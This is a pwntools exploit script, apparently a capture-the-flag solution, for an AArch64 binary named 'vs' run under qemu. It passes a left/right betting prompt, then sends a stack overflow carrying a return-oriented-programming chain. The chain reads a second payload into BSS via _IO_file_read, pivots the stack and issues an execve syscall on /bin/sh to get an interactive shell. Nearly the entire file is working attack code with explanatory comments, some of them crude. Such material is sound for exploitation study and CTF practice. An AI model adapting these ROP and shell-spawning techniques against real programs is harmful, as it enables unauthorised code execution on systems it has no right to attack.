from pwn import *


#return 0 if left and 1 if right
def find_left_or_right(bstring):
    if bstring.index(b"\x01") <= 9:
        return 0
    return 1




context.log_level = 'debug'

e = ELF('./vs')

#p = process('qemu-aarch64 -g 1234 ./vs',shell=True)
p = process('qemu-aarch64 ./vs',shell=True)

#get it right
p.recvuntil(b"Place your bets! Who will win?\n")

b = p.recvuntil(b"------\n\n")
print(b)

l_or_r = find_left_or_right(b)
print(l_or_r)

p.recvuntil(b"(left or right): ")

if l_or_r == 0:
    p.sendline(b'left')
else:
    p.sendline(b'right')
    
p.recvuntil(b':')    

#0x0000000000428d80: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret
LOAD_REGISTERS = 0x0000000000428d80
#0x449bcc: ldr x3, [x22, #0x38] mov x1, x21; mov x2, x20; mov x0, x19; blr x3;
BLR_X3 = 0x449bcc
#0x0000000000440478: mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret; - stack pivot
STACK_PIVOT = 0x0000000000440478
#This is the IO file read. This is part of the vtable. We will need to subtract 0x38 as our BLR_X3
#gadget adds 0x38
#The parameters for this are: (FILE *fp, void *buf, ssize_t size)
IO_FILE_READ_VTABLE_ADDR = 0x04a5b58
#0x00000000004002a0: ldp x29, x30, [sp], #0x10; ret; 
LDP_X29_X30 = 0x00000000004002a0
#Prolog of _IO_fputs
END_OF_IO_FPUTS = 0x0449c10

#some random ass address
BSS_FREE_REGION = 0x4a7600

SVC_GADGET = 0x0426550

STDIN = e.symbols['_IO_2_1_stdin_']
FOPEN = e.symbols['fopen']
FPUTS = e.symbols['fputs']


'''
This gadget is at the end of dlopen and puts x0 into x16 and brs to x16 while also allowing us to setup arguments
'''
DL_TRAMPOLINE = 0x0457c90

'''
'A'*36 - overwrite until {x29,x30}
'A'*7 - don't care, still don't care (Overwrite {x29} with bullshit)
'''
rop_chain = b'A'*36+b'A'*8+p64(LOAD_REGISTERS)

'''
p64(LOAD_REGISTERS) - Overwrite {x30}
'''


'''
The stack order of this is interesting

Starting from sp:
{x29}, {x30}, {x19 (x0)}, {x20 (x2)}, {x21 (x1)}, {x22 (x3 - loaded from x22+0x38)}
x19 = x0
x1=x21
x2 = x20

We are calling _IO_file_read - x0 = FILE*, x1=buf, x2 = size
'''
rop_chain += b'A'*8 + p64(BLR_X3) + p64(STDIN) + p64(4096) + p64(BSS_FREE_REGION) + p64(IO_FILE_READ_VTABLE_ADDR-0x38) 



'''
The purpose of this is to deal with the end of _IO_fputs. This gadget drops us right back into the end of fputs
which allows us to fill our registers and move on
'''
rop_chain += b'A'*8 + p64(END_OF_IO_FPUTS) + b'A'*0x30 



'''
This point, we are trying to return from IO_FPUTS via our BLR_X3 gadget. We just landed here again

The expected register setup is as follows:
{x29}, {x30}, {x19 (x0)}, {x20 (x2)}, {x21 (x1)}, {x22 (x3 loaded from x22+0x38)}, {x23}, {Nothing}

The paranthesis are for the corresponding moves in the BLR_X3 gadget

'''

rop_chain += p64(BSS_FREE_REGION+16) + p64(BLR_X3) + p64(SVC_GADGET) + b'A'*16 + p64(BSS_FREE_REGION-0x38) + b'A' * 16

'''
At this point we're at our stack pivot gadget. The first instruction is mov sp, x29 so we start out in the middle of the BSS region. our stack-based rop chain is done
'''


#Thank god binsh is 8 bytes
#This will be written in BSS_FREE_REGION
write_payload = p64(STACK_PIVOT) +  b'/bin/sh\0' 

#write the rop chain. Whoo functionally unlimited space!
'''
Format:
mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret

{x29}, {x30}, {x19}, {0x18 bytes of jack shit}
'''
write_payload += b'A'*8 + p64(DL_TRAMPOLINE) + b'A'*0x20

'''
dl_trampoline
https://elixir.bootlin.com/glibc/latest/source/sysdeps/aarch64/dl-trampoline.S#L106

We only need to setup x0, x1, and x2. 

'''
EXECVE_SYSCALL = 0xdd

write_payload += p64(EXECVE_SYSCALL) + b'A'*40 + p64(0) + b'A'*8 + p64(BSS_FREE_REGION+8) + p64(0) + b'A'*128

p.sendline(rop_chain)
p.recvuntil(b'\x80\x8d\x42')
p.sendline(write_payload)


p.interactive()